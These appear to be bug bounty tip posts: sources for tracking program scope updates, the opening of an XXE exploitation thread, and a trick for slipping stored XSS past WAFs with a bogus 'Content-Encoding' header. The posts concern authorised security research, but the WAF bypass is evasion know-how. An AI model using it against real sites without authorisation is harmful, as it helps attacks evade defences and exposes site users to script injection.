luffydragneel

Bug Bounty Tips: 🐛🌟 Want to excel in bug bounty hunting? Don't limit yourself to one program or asset. What if I told you that monitoring new assets and programs from various sources can increase your chances of success? 🚀 Here's a valuable list of sources to track all bug bounty platforms and assets: 1️⃣ Chaos Bug Bounty List - Explore public programs and self-hosted bug bounty program assets: 🔗 https://t.co/3d3Jp6xJly 2️⃣ Bug Bounty Targets Data - Access programs and assets from bugcrowd, hackerone, hackenproof, intigriti, yeswehack, and more: 🔗 https://t.co/FXXTCIqcQ7 3️⃣ bbscope - Utilize this awesome CLI tool to collect information about private program targets using your API: 🔗 https://t.co/dlNLP5jX6y What can you do with this data? Here are some ideas: 1️⃣ Monitor these sources for new scope updates and receive notifications on Discord, Slack, or via email. 2️⃣ Establish an automated process to handle new targets, such as collecting subdomains and performing basic checks. 3️⃣ Identify interesting assets and start manual hunting to increase your chances of discovering bugs and reducing duplicates. 🕵️‍♂️ Follow these accounts for real-time scope updates: 1️⃣ h1disclosed - Twitter: 🔗 https://t.co/FPq4HhrosB - Get notifications on program launches and disclosed reports. 2️⃣ bbradar - Track all bug bounty programs at: 🔗 https://t.co/YfbtOjUVN5 3️⃣ inbbupdates - Twitter: 🔗 https://t.co/APqAlptVjJ - Receive notifications on scope changes. This dataset offers endless possibilities. Don't miss out on this opportunity, as many are already harnessing its potential. Elevate your bug bounty game today! 💪🔒 #hackerone #bugcrowd #cybersecurity #bugbountytips #securitytips #bounty #bounties #follow #motivation 🚀💡

Show & Tell: Exploiting an Unusual XXE Vulnerability on a Target App 🕵️‍♂️💻 1/ Often overlooked, XXE vulnerabilities can hide in plain sight, especially in apps seemingly devoid of XML calls to the backend. In this thread, I'll walk you through how I discovered and exploited such an issue in one of my pentest engagements.

🕵️‍♂️Here's another secret no one will tell you about: A Simple WAF Bypass for Stored XSS that has earned me $$$$💰 so far! Stored XSS issues can fetch you rewards ranging from $500 to $7500, depending on the program. WAFs can pose significant challenges when hunting for Stored XSS vulnerabilities, but this simple trick can help you bypass them. By adding 'Content-Encoding: any_random_text' to the request header, you can deceive some WAFs, allowing your payload to slip through undetected. Enjoy the hunt! #bugbounty #securityTips #ethicalhacking #WAFBypass #hackerOne #bugcrowd #bugbountytips